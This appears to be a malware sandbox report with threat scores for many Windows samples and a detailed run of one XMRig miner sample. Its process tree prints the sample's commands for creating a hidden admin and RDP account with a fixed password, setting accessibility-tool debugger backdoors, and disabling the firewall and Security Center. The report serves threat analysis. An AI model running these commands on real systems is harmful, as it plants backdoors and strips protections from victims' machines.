Overview

overview

10

Static

static

10

foo/0044d6...f7.exe

windows7_x64

1

foo/0044d6...f7.exe

windows10_x64

1

foo/034e4c...a9.exe

windows7_x64

4

foo/034e4c...a9.exe

windows10_x64

4

foo/035fa2...72.exe

windows7_x64

10

foo/035fa2...72.exe

windows10_x64

10

foo/04884a...1b.exe

windows7_x64

8

foo/04884a...1b.exe

windows10_x64

8

foo/06ed82...59.exe

windows7_x64

7

foo/06ed82...59.exe

windows10_x64

7

foo/07470b...68.exe

windows7_x64

8

foo/07470b...68.exe

windows10_x64

8

foo/078adb...c0.exe

windows7_x64

10

foo/078adb...c0.exe

windows10_x64

10

foo/09e5c8...b4.exe

windows7_x64

1

foo/09e5c8...b4.exe

windows10_x64

1

foo/0becfe...f4.exe

windows7_x64

10

foo/0becfe...f4.exe

windows10_x64

10

foo/1a78d3...a3.exe

windows7_x64

5

foo/1a78d3...a3.exe

windows10_x64

5

foo/1ffe82...a6.exe

windows7_x64

10

foo/1ffe82...a6.exe

windows10_x64

10

foo/255028...e1.dll

windows7_x64

1

foo/255028...e1.dll

windows10_x64

1

foo/27601d...cc.exe

windows7_x64

8

foo/27601d...cc.exe

windows10_x64

8

foo/27f911...49.exe

windows7_x64

10

foo/27f911...49.exe

windows10_x64

10

foo/28408c...c5.exe

windows7_x64

10

foo/28408c...c5.exe

windows10_x64

10

foo/296822...e4.dll

windows7_x64

3

foo/296822...e4.dll

windows10_x64

3

foo/2de7b8...a4.exe

windows7_x64

10

foo/2de7b8...a4.exe

windows10_x64

10

foo/2e00df...8b.exe

windows7_x64

9

foo/2e00df...8b.exe

windows10_x64

9

foo/2e90a1...22.exe

windows7_x64

6

foo/2e90a1...22.exe

windows10_x64

6

foo/2f215e...b0.dll

windows7_x64

10

foo/2f215e...b0.dll

windows10_x64

10

foo/30bc06...3e.exe

windows7_x64

10

foo/30bc06...3e.exe

windows10_x64

10

foo/312e67...f3.exe

windows7_x64

4

foo/312e67...f3.exe

windows10_x64

4

foo/383497...1b.exe

windows7_x64

10

foo/383497...1b.exe

windows10_x64

10

foo/39555e...ec.exe

windows7_x64

10

foo/39555e...ec.exe

windows10_x64

10

foo/39e531...04.exe

windows7_x64

10

foo/39e531...04.exe

windows10_x64

10

foo/3aba72...cd.exe

windows7_x64

1

foo/3aba72...cd.exe

windows10_x64

1

foo/406c9b...fe.exe

windows7_x64

10

foo/406c9b...fe.exe

windows10_x64

10

foo/457cfd...ca.exe

windows7_x64

7

foo/457cfd...ca.exe

windows10_x64

7

foo/4761e4...60.exe

windows7_x64

8

foo/4761e4...60.exe

windows10_x64

8

foo/487f1b...04.exe

windows7_x64

8

foo/487f1b...04.exe

windows10_x64

7

foo/4a74c9...cf.exe

windows7_x64

10

foo/4a74c9...cf.exe

windows10_x64

10

foo/4b2d78...4b.exe

windows7_x64

8

foo/4b2d78...4b.exe

windows10_x64

8

foo/4c49c2...ba.exe

windows7_x64

1

foo/4c49c2...ba.exe

windows10_x64

1

foo/4cfe8f...77.exe

windows7_x64

9

foo/4cfe8f...77.exe

windows10_x64

9

foo/4ea454...13.exe

windows7_x64

8

foo/4ea454...13.exe

windows10_x64

8

foo/52d6c5...7e.exe

windows7_x64

7

foo/52d6c5...7e.exe

windows10_x64

7

foo/55fc11...e0.exe

windows7_x64

foo/55fc11...e0.exe

windows10_x64

10

foo/59f0fb...06.exe

windows7_x64

1

foo/59f0fb...06.exe

windows10_x64

1

foo/5b1c0d...cb.exe

windows7_x64

1

foo/5b1c0d...cb.exe

windows10_x64

1

foo/5bc72a...ea.exe

windows7_x64

8

foo/5bc72a...ea.exe

windows10_x64

8

foo/5d3305...2a.exe

windows7_x64

7

foo/5d3305...2a.exe

windows10_x64

7

foo/5d9775...39.exe

windows7_x64

8

foo/5d9775...39.exe

windows10_x64

8

foo/60121e...3e.exe

windows7_x64

9

foo/60121e...3e.exe

windows10_x64

9

foo/62565a...fd.exe

windows7_x64

10

foo/62565a...fd.exe

windows10_x64

10

foo/62a3fd...64.exe

windows7_x64

8

foo/62a3fd...64.exe

windows10_x64

10

foo/63e9ce...d0.exe

windows7_x64

8

foo/63e9ce...d0.exe

windows10_x64

8

foo/6497ba...c5.exe

windows7_x64

10

foo/6497ba...c5.exe

windows10_x64

10

foo/698cc8...31.exe

windows7_x64

7

foo/698cc8...31.exe

windows10_x64

7

foo/6f2c5c...d5.exe

windows7_x64

7

foo/6f2c5c...d5.exe

windows10_x64

7

foo/798f5e...ba.exe

windows7_x64

10

foo/798f5e...ba.exe

windows10_x64

10

foo/7aec86...51.exe

windows7_x64

1

foo/7aec86...51.exe

windows10_x64

1

foo/84bf6e...64.exe

windows7_x64

8

foo/84bf6e...64.exe

windows10_x64

8

foo/907b7d...b3.exe

windows7_x64

8

foo/907b7d...b3.exe

windows10_x64

8

foo/928f1d...ee.exe

windows7_x64

1

foo/928f1d...ee.exe

windows10_x64

1

foo/9401b0...6c.exe

windows7_x64

1

foo/9401b0...6c.exe

windows10_x64

1

foo/97dd87...84.exe

windows7_x64

10

foo/97dd87...84.exe

windows10_x64

10

foo/9b8c48...a4.exe

windows7_x64

8

foo/9b8c48...a4.exe

windows10_x64

8

foo/9cde71...cd.exe

windows7_x64

6

foo/9cde71...cd.exe

windows10_x64

6

foo/9d3438...4b.exe

windows7_x64

8

foo/9d3438...4b.exe

windows10_x64

1

foo/9f8818...2d.exe

windows7_x64

8

foo/9f8818...2d.exe

windows10_x64

3

foo/a17bdc...cf.exe

windows7_x64

9

foo/a17bdc...cf.exe

windows10_x64

9

foo/a29811...46.exe

windows7_x64

10

foo/a29811...46.exe

windows10_x64

10

foo/aa3b51...52.exe

windows7_x64

10

foo/aa3b51...52.exe

windows10_x64

10

foo/acf0b7...c4.exe

windows7_x64

8

foo/acf0b7...c4.exe

windows10_x64

8

foo/aeca5c...f7.exe

windows7_x64

1

foo/aeca5c...f7.exe

windows10_x64

1

foo/b10714...f3.exe

windows7_x64

8

foo/b10714...f3.exe

windows10_x64

8

foo/b23652...9f.exe

windows7_x64

6

foo/b23652...9f.exe

windows10_x64

6

foo/b514b5...fc.exe

windows7_x64

1

foo/b514b5...fc.exe

windows10_x64

1

foo/b64196...23.exe

windows7_x64

7

foo/b64196...23.exe

windows10_x64

7

foo/b693df...60.exe

windows7_x64

7

foo/b693df...60.exe

windows10_x64

7

foo/b6e7c9...bc.exe

windows7_x64

10

foo/b6e7c9...bc.exe

windows10_x64

10

foo/b7d5f0...4a.exe

windows7_x64

10

foo/b7d5f0...4a.exe

windows10_x64

10

foo/ba2d46...29.exe

windows7_x64

1

foo/ba2d46...29.exe

windows10_x64

1

foo/bad78e...e5.exe

windows7_x64

9

foo/bad78e...e5.exe

windows10_x64

9

foo/bc6536...b9.exe

windows7_x64

10

foo/bc6536...b9.exe

windows10_x64

10

foo/be85e0...2c.exe

windows7_x64

1

foo/be85e0...2c.exe

windows10_x64

1

foo/c914b1...ee.exe

windows7_x64

3

foo/c914b1...ee.exe

windows10_x64

3

foo/c944ea...cc.exe

windows7_x64

8

foo/c944ea...cc.exe

windows10_x64

8

foo/cad363...8b.exe

windows7_x64

6

foo/cad363...8b.exe

windows10_x64

6

foo/cd89b6...df.exe

windows7_x64

8

foo/cd89b6...df.exe

windows10_x64

8

foo/d81e76...c4.exe

windows7_x64

10

foo/d81e76...c4.exe

windows10_x64

10

foo/d86d2c...08.exe

windows7_x64

10

foo/d86d2c...08.exe

windows10_x64

10

foo/d8e37d...98.exe

windows7_x64

9

foo/d8e37d...98.exe

windows10_x64

9

foo/dea515...e1.exe

windows7_x64

10

foo/dea515...e1.exe

windows10_x64

6

foo/dfcc55...b8.exe

windows7_x64

7

foo/dfcc55...b8.exe

windows10_x64

7

foo/e03bd4...fe.exe

windows7_x64

8

foo/e03bd4...fe.exe

windows10_x64

8

foo/e16ec7...2d.exe

windows7_x64

8

foo/e16ec7...2d.exe

windows10_x64

8

foo/e61c0e...0e.exe

windows7_x64

7

foo/e61c0e...0e.exe

windows10_x64

7

foo/e78fad...51.exe

windows7_x64

8

foo/e78fad...51.exe

windows10_x64

8

foo/e7ad45...88.exe

windows7_x64

3

foo/e7ad45...88.exe

windows10_x64

3

foo/e95678...8f.exe

windows7_x64

1

foo/e95678...8f.exe

windows10_x64

1

foo/edf723...ee.dll

windows7_x64

1

foo/edf723...ee.dll

windows10_x64

1

foo/f2366f...f5.exe

windows7_x64

1

foo/f2366f...f5.exe

windows10_x64

1

foo/f645a9...1f.exe

windows7_x64

1

foo/f645a9...1f.exe

windows10_x64

1

foo/f65e75...56.exe

windows7_x64

1

foo/f65e75...56.exe

windows10_x64

1

foo/f66028...2b.exe

windows7_x64

8

foo/f66028...2b.exe

windows10_x64

8

foo/f6c1c7...89.exe

windows7_x64

10

foo/f6c1c7...89.exe

windows10_x64

10

foo/fbab90...7c.exe

windows7_x64

7

foo/fbab90...7c.exe

windows10_x64

7

foo/fcdc00...b3.exe

windows7_x64

8

foo/fcdc00...b3.exe

windows10_x64

8

foo/fffb61...ba.exe

windows7_x64

1

foo/fffb61...ba.exe

windows10_x64

1

Analysis

  • max time kernel
    42s
  • max time network
    6s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    11-08-2020 12:30

General

  • Target

    foo/bc6536b86b04cf5b3bf7cd353d615ab9.exe

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets file execution options in registry 2 TTPs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Modifies WinLogon 2 TTPs 13 IoCs
  • Drops file in System32 directory 6 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\foo\bc6536b86b04cf5b3bf7cd353d615ab9.exe
    "C:\Users\Admin\AppData\Local\Temp\foo\bc6536b86b04cf5b3bf7cd353d615ab9.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:732
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\U.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1648
      • C:\Windows\SysWOW64\chcp.com
        chcp 1251
        3⤵
          PID:1524
        • C:\Windows\SysWOW64\net.exe
          net user ontar /DELETE
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1496
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user ontar /DELETE
            4⤵
              PID:1692
          • C:\Windows\SysWOW64\net.exe
            net user ontar Preaba1! /add
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1800
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 user ontar Preaba1! /add
              4⤵
                PID:1828
            • C:\Windows\SysWOW64\net.exe
              net localgroup Administrators ontar /add
              3⤵
                PID:1896
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 localgroup Administrators ontar /add
                  4⤵
                    PID:1904
                • C:\Windows\SysWOW64\net.exe
                  net localgroup "Remote Desktop Users" ontar /add
                  3⤵
                    PID:1148
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" ontar /add
                      4⤵
                        PID:1808
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup Администраторы ontar /add
                      3⤵
                        PID:1596
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 localgroup Администраторы ontar /add
                          4⤵
                            PID:1624
                        • C:\Windows\SysWOW64\net.exe
                          net localgroup "Пользователи удаленного рабочего стола" ontar /add
                          3⤵
                            PID:2040
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" ontar /add
                              4⤵
                                PID:1988
                            • C:\Windows\SysWOW64\net.exe
                              net localgroup Administrateurs ontar /add
                              3⤵
                                PID:824
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 localgroup Administrateurs ontar /add
                                  4⤵
                                    PID:2044
                                • C:\Windows\SysWOW64\net.exe
                                  net localgroup "Utilisateurs du Bureau а distance" ontar /add
                                  3⤵
                                    PID:316
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 localgroup "Utilisateurs du Bureau а distance" ontar /add
                                      4⤵
                                        PID:1092
                                    • C:\Windows\SysWOW64\net.exe
                                      net localgroup Beheerders ontar /add
                                      3⤵
                                        PID:812
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 localgroup Beheerders ontar /add
                                          4⤵
                                            PID:540
                                        • C:\Windows\SysWOW64\net.exe
                                          net localgroup "Remote Desktop-gebruikers" ontar /add
                                          3⤵
                                            PID:736
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 localgroup "Remote Desktop-gebruikers" ontar /add
                                              4⤵
                                                PID:1472
                                            • C:\Windows\SysWOW64\net.exe
                                              net localgroup Beheerders ontar /add
                                              3⤵
                                                PID:1520
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 localgroup Beheerders ontar /add
                                                  4⤵
                                                    PID:1372
                                                • C:\Windows\SysWOW64\net.exe
                                                  net localgroup "Remote Desktop gebruikers" ontar /add
                                                  3⤵
                                                    PID:1672
                                                    • C:\Windows\SysWOW64\net1.exe
                                                      C:\Windows\system32\net1 localgroup "Remote Desktop gebruikers" ontar /add
                                                      4⤵
                                                        PID:1820
                                                    • C:\Windows\SysWOW64\net.exe
                                                      net localgroup ??? ontar /add
                                                      3⤵
                                                        PID:1872
                                                        • C:\Windows\SysWOW64\net1.exe
                                                          C:\Windows\system32\net1 localgroup ??? ontar /add
                                                          4⤵
                                                            PID:1836
                                                        • C:\Windows\SysWOW64\net.exe
                                                          net localgroup "??????" ontar /add
                                                          3⤵
                                                            PID:1368
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 localgroup "??????" ontar /add
                                                              4⤵
                                                                PID:1876
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net localgroup ??? ontar /add
                                                              3⤵
                                                                PID:1916
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 localgroup ??? ontar /add
                                                                  4⤵
                                                                    PID:1940
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net localgroup "??????????????" ontar /add
                                                                  3⤵
                                                                    PID:1944
                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                      C:\Windows\system32\net1 localgroup "??????????????" ontar /add
                                                                      4⤵
                                                                        PID:1932
                                                                    • C:\Windows\SysWOW64\net.exe
                                                                      net localgroup Administratorzy ontar /add
                                                                      3⤵
                                                                        PID:1896
                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                          C:\Windows\system32\net1 localgroup Administratorzy ontar /add
                                                                          4⤵
                                                                            PID:1968
                                                                        • C:\Windows\SysWOW64\net.exe
                                                                          net localgroup "Uzytkownicy pulpitu zdalnego" ontar /add
                                                                          3⤵
                                                                            PID:1068
                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                              C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" ontar /add
                                                                              4⤵
                                                                                PID:1764
                                                                            • C:\Windows\SysWOW64\net.exe
                                                                              net localgroup Administratorer ontar /add
                                                                              3⤵
                                                                                PID:1900
                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                  C:\Windows\system32\net1 localgroup Administratorer ontar /add
                                                                                  4⤵
                                                                                    PID:1808
                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                  net localgroup "Brukere av eksternt skrivebord" ontar /add
                                                                                  3⤵
                                                                                    PID:1576
                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                      C:\Windows\system32\net1 localgroup "Brukere av eksternt skrivebord" ontar /add
                                                                                      4⤵
                                                                                        PID:1632
                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                      net localgroup Administradores ontar /add
                                                                                      3⤵
                                                                                        PID:2032
                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                          C:\Windows\system32\net1 localgroup Administradores ontar /add
                                                                                          4⤵
                                                                                            PID:1596
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net localgroup "Usuarios Remote Desktop" ontar /add
                                                                                          3⤵
                                                                                            PID:1088
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 localgroup "Usuarios Remote Desktop" ontar /add
                                                                                              4⤵
                                                                                                PID:2000
                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                              net localgroup Administradores ontar /add
                                                                                              3⤵
                                                                                                PID:1980
                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                  C:\Windows\system32\net1 localgroup Administradores ontar /add
                                                                                                  4⤵
                                                                                                    PID:1108
                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                  net localgroup "Usuarios de escritorio remoto" ontar /add
                                                                                                  3⤵
                                                                                                    PID:268
                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" ontar /add
                                                                                                      4⤵
                                                                                                        PID:824
                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                      net localgroup gli amministratori ontar /add
                                                                                                      3⤵
                                                                                                        PID:660
                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                          C:\Windows\system32\net1 localgroup gli amministratori ontar /add
                                                                                                          4⤵
                                                                                                            PID:1336
                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                          net localgroup "Utenti desktop remoto" ontar /add
                                                                                                          3⤵
                                                                                                            PID:960
                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                              C:\Windows\system32\net1 localgroup "Utenti desktop remoto" ontar /add
                                                                                                              4⤵
                                                                                                                PID:696
                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                              net localgroup administratorer ontar /add
                                                                                                              3⤵
                                                                                                                PID:844
                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                  C:\Windows\system32\net1 localgroup administratorer ontar /add
                                                                                                                  4⤵
                                                                                                                    PID:1600
                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                  net localgroup "Anvandare av fjarrskrivbord" ontar /add
                                                                                                                  3⤵
                                                                                                                    PID:540
                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                      C:\Windows\system32\net1 localgroup "Anvandare av fjarrskrivbord" ontar /add
                                                                                                                      4⤵
                                                                                                                        PID:1440
                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                      net localgroup Administratoren ontar /add
                                                                                                                      3⤵
                                                                                                                        PID:1512
                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                          C:\Windows\system32\net1 localgroup Administratoren ontar /add
                                                                                                                          4⤵
                                                                                                                            PID:1568
                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                          net localgroup "RemoteDesktopBenutzer" ontar /add
                                                                                                                          3⤵
                                                                                                                            PID:1852
                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                              C:\Windows\system32\net1 localgroup "RemoteDesktopBenutzer" ontar /add
                                                                                                                              4⤵
                                                                                                                                PID:1844
                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                              net localgroup Administratoren ontar /add
                                                                                                                              3⤵
                                                                                                                                PID:1372
                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                  C:\Windows\system32\net1 localgroup Administratoren ontar /add
                                                                                                                                  4⤵
                                                                                                                                    PID:1824
                                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                                  net localgroup "Remote Desktop Benutzer" ontar /add
                                                                                                                                  3⤵
                                                                                                                                    PID:1496
                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                      C:\Windows\system32\net1 localgroup "Remote Desktop Benutzer" ontar /add
                                                                                                                                      4⤵
                                                                                                                                        PID:1828
                                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                                      net localgroup Administradores ontar /add
                                                                                                                                      3⤵
                                                                                                                                        PID:1920
                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                          C:\Windows\system32\net1 localgroup Administradores ontar /add
                                                                                                                                          4⤵
                                                                                                                                            PID:1784
                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                          net localgroup "Utilizadores do ambiente de trabalho remoto" ontar /add
                                                                                                                                          3⤵
                                                                                                                                            PID:1940
                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                              C:\Windows\system32\net1 localgroup "Utilizadores do ambiente de trabalho remoto" ontar /add
                                                                                                                                              4⤵
                                                                                                                                                PID:1928
                                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                                              net localgroup Administrators ontar /add
                                                                                                                                              3⤵
                                                                                                                                                PID:1404
                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                  C:\Windows\system32\net1 localgroup Administrators ontar /add
                                                                                                                                                  4⤵
                                                                                                                                                    PID:728
                                                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                                                  net localgroup "Utenti desktop remoto" ontar /add
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1896
                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                      C:\Windows\system32\net1 localgroup "Utenti desktop remoto" ontar /add
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1588
                                                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                                                      net localgroup Administradores ontar /add
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1068
                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                          C:\Windows\system32\net1 localgroup Administradores ontar /add
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1640
                                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                                          net localgroup "Usuarios de escritorio remoto" ontar /add
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1900
                                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                              C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" ontar /add
                                                                                                                                                              4⤵
                                                                                                                                                                PID:1564
                                                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                                                              net localgroup yoneticileri ontar /add
                                                                                                                                                              3⤵
                                                                                                                                                                PID:1576
                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                  C:\Windows\system32\net1 localgroup yoneticileri ontar /add
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1124
                                                                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                  net localgroup "Uzak masaustu kullan?c?lar?" ontar /add
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2032
                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                      C:\Windows\system32\net1 localgroup "Uzak masaustu kullan?c?lar?" ontar /add
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1216
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2040
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:1088
                                                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                          net accounts /forcelogoff:no
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:756
                                                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                              C:\Windows\system32\net1 accounts /forcelogoff:no
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1156
                                                                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                              net accounts /maxpwage:unlimited
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:1140
                                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                  C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:824
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v helpassistant /t REG_DWORD /d "00000000" /f
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Modifies WinLogon
                                                                                                                                                                                  PID:1516
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ontar /t REG_DWORD /d "00000000" /f
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Modifies WinLogon
                                                                                                                                                                                  PID:1336
                                                                                                                                                                                • C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                  chcp 1251
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1092
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SYSTEМ /t REG_DWORD /d "00000000" /f
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Modifies WinLogon
                                                                                                                                                                                    PID:1036
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Аdministrator /t REG_DWORD /d "00000000" /f
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Modifies WinLogon
                                                                                                                                                                                    PID:696
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Aдминистратор /t REG_DWORD /d "00000000" /f
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Modifies WinLogon
                                                                                                                                                                                    PID:992
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPLifeInterval /t REG_DWORD /d "00005180" /f
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1616
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v SFCDisable /t REG_DWORD /d "FFFFFF9D" /f
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1600
                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                        sc config rasman start= auto
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:812
                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                          sc config remoteaccess start= auto
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1552
                                                                                                                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                            net start rasman
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:540
                                                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                C:\Windows\system32\net1 start rasman
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1860
                                                                                                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                net start remoteaccess
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1700
                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                    C:\Windows\system32\net1 start remoteaccess
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:1512
                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                    sc config wscsvc start= disabled
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:1796
                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                      sc config SharedAccess start= disabled
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1844
                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                        sc stop wscsvc
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1880
                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                          sc stop SharedAccess
                                                                                                                                                                                                          3⤵
